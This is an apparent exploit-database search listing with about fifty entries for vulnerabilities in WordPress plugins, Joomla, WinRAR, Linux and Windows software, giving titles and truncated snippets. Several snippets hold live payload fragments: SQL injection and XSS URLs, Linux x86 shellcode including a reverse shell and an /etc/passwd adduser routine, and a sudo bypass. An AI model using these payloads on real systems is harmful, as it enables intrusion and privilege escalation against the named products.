39001 matches found
Part-DB 0.4 - Authentication Bypass Vulnerability
Exploit for php platform in category web applications...
ChaosPro 2.0 - Buffer Overflow (SEH) Exploit
Exploit Title: ChaosPro 2.0 - Buffer Overflow SEH Exploit Author: Chase Hatch SYANiDE Vendor Homepage: http://www.chaospro.de/ Software link: http://www.chaospro.de/cpro20.zip Version: 2.0 Tested on: Windows XP Pro OEM !/usr/bin/env python2 import os, sys sploit = "A" 5000 Crash! 41414141 in SEH!...
waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - (description) Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting Exploit Author: Cakes Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON Software Link:...
ClonOs WEB UI 19.09 - Improper Access Control Exploit
Exploit for php platform in category web applications Exploit Title: ClonOs WEB UI 19.09 - Improper Access Control Exploit Author: İbrahim Hakan Şeker Vendor Homepage: https://clonos.tekroutine.com/ Software Link: https://github.com/clonos/control-pane Version: 19.09 Tested on: ClonOs CVE :...
AUO SunVeillance Monitoring System 1.1.9e - (MailAdd) SQL Injection Vulnerability
Exploit for hardware platform in category web applications Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection Exploit Author: Luca.Chiou Vendor Homepage: https://www.auo.com/zh-TW Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e Tested on: ...
AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control
Exploit for hardware platform in category web applications Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control Exploit Author: Luca.Chiou Vendor Homepage: https://www.auo.com/zh-TW Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e Tested on:...
Linux Polkit pkexec Helper PTRACE_TRACEME Local Root Exploit
This Metasploit module exploits an issue in ptracelink in kernel/ptrace.c before Linux kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but not over an SSH session, as it requires execution from within the context of a user with an active Polkit agent. In the Linux kernel...
WordPress Sliced Invoices 3.8.2 SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress Sliced Invoices /wp-admin/admin.php?action=duplicatequoteinvoice&post=8%20and%20selectfromselectsleep20a--%20 - The response will be returned after 20 seconds proving the successful exploitation of the vulnerability. -...
WordPress Sliced Invoices 3.8.2 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress Sliced Invoices /wp-admin/admin.php?action=duplicatequoteinvoice&post=%3Cscript%3Ealert1%3C%2fscript%3E - The response will contain: Creation failed, could not find original invoice or quote: alert1 0day.today 2019-12-...
IObit Uninstaller 9.1.0.8 - (IObitUnSvr) Unquoted Service Path Vulnerability
Title: IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path Author: Sainadh Jamalpur Vendor Homepage: https://www.iobit.com Software Link: https://www.iobit.com/en/advanceduninstaller.php Version : 9.1.0.8 Tested on: Windows 10 64bitEN CVE : N/A 1. Description: Unquoted service paths in...
Joomla! 3.4.6 - Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: Joomla! 3.4.6 - Remote Code Execution Metasploit Vendor Homepage: https//www.joomla.it/ Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 Version: 3.0.0 -- 3.4.6 Tested on: Linux CVE : N/A This module requires...
Rocket.Chat 2.1.0 - Cross-Site Scripting Vulnerability
Exploit for linux platform in category web applications Title: Rocket.Chat 2.1.0 - Cross-Site Scripting Author: 3H34N Product: Rocket.Chat Vendor: https://rocket.chat/ Vulnerable Versions: Rocket.Chat 2. Open a chat session 3. Send payload with your web server url 4. Token will be written in...
Sangoma SBC 2.3.23-119-GA Unauthenticated User Creation Vulnerability
A remotely exploitable vulnerability exists in the 2.3.23-119-GA version of Sangoma SBC that would allow an unauthenticated user to create a privileged user on the system using the web application login interface. Description A remotely exploitable vulnerability exists in the 2.3.23-119-GA versio...
Xorg X11 Server SUID modulepath Privilege Escalation Exploit
This Metasploit module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 up to 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and ru...
WiKID Systems 2FA Enterprise Server 4.2.0-b2032 SQL Injection / XSS / CSRF Vulnerabilities
WiKID Systems 2FA Enterprise Server version 4.2.0-b2032 suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities. WiKID Systems 2FA Enterprise Serverversion 4.2.0-b2032 and earlier was found to be vulnerable to multiple Cross-Site Scripting, SQLi, an...
Sangoma SBC 2.3.23-119-GA Authentication Bypass Vulnerability
A remotely exploitable vulnerability exists in the 2.3.23-119-GA version of Sangoma SBC that would allow an unauthenticated user to bypass authentication and login as a non-existent user but with complete access to the dashboard including additional privileged user creation capabilities...
Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
Exploit Name: Linux/x86 - execve/bin/sh socket reuse Shellcode 42 bytes Author : WangYihang Tested on: Linuxx86 Shellcode Length: 42 CVE: N/A ;================================================================================ Shellcode : char shellcode =...
Total.js CMS 12 - Widget JavaScript Code Injection Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Total.js CMS 12 Widget JavaScript Code Injection', 'Description' = %q This module exploits a vulnerability in Total.js CMS. The issue is that a...
Moxa EDR-810 - Command Injection / Information Disclosure Vulnerabilities
During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the w...
Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution Exploit
Exploit Title: Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution Date: 2019-10-19 Exploit Author: hyp3rlinx Vendor Homepage: www.trendmicro.com Version: 1.62.0.1218 and below Tested on: Microsoft Windows CVE: N/A + Credits: John Page aka hyp3rlinx + Website:...
winrar 5.80 - XML External Entity Injection Exploit
Exploit Title: winrar 5.80 - XML External Entity Injection Exploit Author: albalawi Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe Version: 5.80 Tested on: Microsoft Windows Version 10.0.18362.418 64bit POC 1- python -m SimpleHTTPServer listens Port 8000 2- ope...
VMware VeloCloud 3.3.0 / 3.2.2 Authorization Bypass Vulnerability
Exploit for linux platform in category web applications Product: VeloCloud Vendor: VMware CVE ID: CVE-2019-5533 CSNC ID: CSNC-2019-007 Subject: Authorization Bypass Risk: Moderate Effect: Remotely exploitable CVSS v3.1 Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N Author: Silas Bärtsch Date:...
winrar 5.80 64bit - Denial of Service Exploit
Exploit Title: winrar 5.80 64bit - Denial of Service Exploit Author: alblalawi Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe Version: 5.80 Tested on: Microsoft Windows Version 10.0.18362.418 64bit 1- open winrar or any file.rar 2- help 3- help topics 4- Drag t...
Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- 7f2c.8be8: Access violation - code c0000005 first chance First chance exceptions are reported before any exception handling. This...
ASUS RT-N10+ 2.0.3.4 CSRF / XSS / Command Execution Exploit
ASUS RT-N10+ with firmware version 2.0.3.4 suffers from cross site request forgery and cross site scripting vulnerabilities that can assist with achieving command execution. Exploit Title: XSS And CSRF to RCE in ASUS RT-N10 Repeater Mode Exploit Author: Matheus Vrech Vendor Homepage:...
Joomla! 3.4.6 - Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: Joomla! 3.4.6 - Remote Code Execution Google Dork: N/A Date: 2019-10-02 Exploit Author: Alessandro Groppo Vendor Homepage: https//www.joomla.it/ Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 Version: 3.0.0 --...
Solaris xscreensaver 11.4 - Privilege Escalation Exploit
@Mediaservice.net Security Advisory 2019-02 last updated on 2019-10-16 Title: Local privilege escalation on Solaris 11.x via xscreensaver Application: Jamie Zawinski's xscreensaver 5.39 distributed with Solaris 11.4 Jamie Zawinski's xscreensaver 5.15 distributed with Solaris 11.3 Other versions...
Microsoft Windows x64 – Privilege Escalation (UAC Protection Bypass printui.exe) Exploit
include include include include "resource.h" include include include define err -1 define dis 0 define def 1 define max 2 define BUFFER 8192 int CheckUac int ConsentAdmin; int EnableLua; DWORD BufferSize = BUFFER; RegGetValueHKEYLOCALMACHINE,...
WorkgroupMail 7.5.1 - (WorkgroupMail) Unquoted Service Path Vulnerability
Exploit Title : WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path Exploit Author : Cakes Vendor: Softalk Version : 7.5.1 Software: http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3 Tested on Windows 10 CVE : N/A c:\sc qc WorkgroupMail SC QueryServiceConfig SUCCESS...
Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting Google Dork: inurl:"\wp-content\plugins\soliloquy-lite" Exploit Author: Unk9vvN Vendor Homepage: https://soliloquywp.com/ Software Link:...
Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications...
Restaurant Management System 1.0 - Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: Restaurant Management System 1.0 - Remote Code Execution Exploit Author: Ibad Shah Vendor Homepage: https://www.sourcecodester.com/users/lewa Software Link:...
Whatsapp 2.19.216 - Remote Code Execution Exploit
Exploit Title: Whatsapp 2.19.216 - Remote Code Execution Exploit Author: Valerio Brussani @valbrux Vendor Homepage: https://www.whatsapp.com/ Version: include include include typedef uint8t byte; char gadgetp; void libc, lib; //dls iteration for rop int dlcallbackstruct dlphdrinfo info, sizet siz...
Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting Google Dork: inurl:"\wp-content\plugins\foogallery" Exploit Author: Unk9vvN Vendor Homepage: https://foo.gallery/ Software Link:...
BlackMoon FTP Server 3.1.2.1731 - (BMFTP-RELEASE) Unquoted Serive Path Vulnerability
Exploit Title: BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path Exploit Author: Debashis Pal Vendor : Blackmoonftpserver Source: http://www.tucows.com/preview/222822/BlackMoon-FTP-Server?q=FTP+server Version: BlackMoon FTP Server 3.1.2.1731 CVE : N/A Tested on: Windows 7...
Telegram Desktop (session hijacking) Payload Exploit
This vulnerability makes you able to Get full access. By hijacking User session using payload...
Web Companion versions 5.1.1035.1047 - (WCAssistantService) Unquoted Service Path Vulnerability
Exploit Title: Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path Exploit Author: Debashis Pal Vendor Homepage : https://webcompanion.com Source: https://webcompanion.com Version: Web Companion versions 5.1.1035.1047 CVE : N/A Tested on: Windows 7 SP164bit 1...
ThinVNC 1.0b1 - Authentication Bypass Exploit
Exploit Title: ThinVNC 1.0b1 - Authentication Bypass Exploit Author: Nikhith Tumamlapalli Contributor WarMarX Vendor Homepage: https://sourceforge.net/projects/thinvnc/ Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC1.0b1/ThinVNC1.0b1.zip/download Version: 1.0b1 Tested on:...
Accounts Accounting 7.02 - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Express Accounts Accounting 7.02 - Persistent Cross-Site Scripting Exploit Author: Debashis Pal Vendor Homepage: https://www.nchsoftware.com Source: https://www.nchsoftware.com/accounting/index.html Version: Express Accounts...
LiteManager 4.5.0 - (romservice) Unquoted Serive Path Vulnerability
Exploit Title : LiteManager 4.5.0 - 'romservice' Unquoted Serive Path Exploit Author : Cakes Vendor: LiteManager Team Version : LiteManager 4.5.0 Software: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support Tested on Windows 10 CVE : N/A c:\sc qc romservice SC...
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Exploit Title: Linux/x86 - execve /bin/sh ShellCode 25 bytes Author: bolonobolo Vendor Homepage: None Software Link: None Tested on: Linux x86 CVE: N/A / global start section .text start: cdq ; xor edx mul edx lea ecx, eax mov esi, 0x68732f2f mov edi, 0x6e69622f push ecx ; push NULL in stack push...
Zilab Remote Console Server 3.2.9 - (zrcs) Unquoted Service Path Vulnerability
Exploit Title : Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path Exploit Author : Cakes Vendor: Zilab Software Inc Version : Zilab Remote Console Server 3.2.9 Software: http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support Tested on Windows 10 CVE : N/...
CyberArk Password Vault 10.6 - Authentication Bypass Vulnerability
Exploit for linux platform in category web applications Exploit Title: CyberArk Password Vault 10.6 - Authentication Bypass Author: Daniel Martinez Adan adon90 Vendor: https://www.cyberark.com Software:...
X.Org X Server 1.20.4 - Local Stack Overflow Exploit
Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow Exploit Author: Marcelo Vázquez aka s4vitar Vendor Homepage: https://www.x.org/ Version: = 1.20.4 Tested on: Linux CVE: CVE-2019-17624 !/usr/bin/python coding: utf-8 Author: Marcelo Vázquez aka s4vitar X.Org X Server 1.20.4 / X Protocol...
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode 74 bytes Author: bolonobolo Vendor Homepage: None Software Link: None Tested on: Linux x86 Comments: add user "User" to /etc/passwd CVE: N/A / 00000000 31DB xor ebx,ebx 00000002 31C9 xor ecx,ecx 00000004 66B90104 mov cx,0x401...
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode 91 bytes Author: bolonobolo Tested on: Linux x86 Software: N/A CVE: N/A / global start section .text start: ;socket xor ecx, ecx ; xoring ECX xor ebx, ebx ; xoring EBX mul ebx ; xoring EAX and EDX inc cl ; ECX should be 1...
Mikogo 5.2.2.150317 - (Mikogo-Service) Unquoted Serive Path Vulnerability
Exploit Title : Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path Exploit Author : Cakes Vendor: LiteManager Team Version : LiteManager 4.5.0 Software: http://html.tucows.com/preview/518015/Mikogo?q=remote+support Tested on Windows 10 CVE : N/A c:\sc qc Mikogo-Service SC...
Lavasoft 2.3.4.7 - (LavasoftTcpService) Unquoted Service Path Vulnerability
Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path Author: Luis MedinaL Vendor Homepage: https://www.adaware.com/ Software Link : https://www.adaware.com/antivirus Version : 2.3.4.7 Tested on: Microsoft Windows 10 Pro x64 ESP Description: Lavasoft 2.3.4.7 installs LavasoftTcpService as...
Bolt CMS 3.6.10 - Cross-Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery Exploit Author: r3m0t3nu11Zero-Way Vendor Homepage: https://bolt.cm/ Software Link: https://bolt.cm/ Version: up to date and 6.5 Tested on: Linux CVE : CVE-2019-1759 last version Csrf...
sudo 1.8.28 - Security Bypass Exploit
Exploit Title : sudo 1.8.28 - Security Bypass Original Author: Joe Vennix Exploit Author : Mohin Paramasivam Version : Sudo priv" os.system"cat priv | grep 'ALL' | cut -d '' -f 2 binary" binaryfile = open"binary" binary= binaryfile.read execute sudo exp...